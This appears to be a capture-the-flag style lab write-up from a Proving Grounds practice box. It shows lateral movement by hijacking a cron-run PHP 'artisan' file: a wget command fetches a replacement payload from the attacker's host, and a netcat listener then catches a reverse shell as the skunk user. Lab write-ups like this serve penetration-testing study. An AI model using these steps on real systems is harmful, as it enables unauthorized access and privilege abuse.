LaVita_Lateral_Movement_skunk

skunk

---

A root cronjob process has been identified to execute a PHP script as the skunk user with an interval of 30 seconds. The PHP script, /var/www/html/lavita/artisan, is OWNED by the current user; www-data

This would mean that I could hijack the PHP file to get code execution as the skunk user, leveraging the cronjob.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita]
└─$ nano artisan

I will create the artisan file with the payload in it

www-data@debian:/var/www/html/lavita$ mv artisan artisan.bak ; wget -q http://192.168.45.249/artisan ; chmod 755 ./artisan

Then changing the name of the original artisan file and replacing it with the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ nnc 6666
listening on [any] 6666 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.38] 52756
SOCKET: Shell has connected! PID: 17118
whoami
skunk
hostname
debian
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:2c5d/64 scope link 
       valid_lft forever preferred_lft forever

Lateral Movement made to the skunk user via exploiting a cronjob process with file hijacking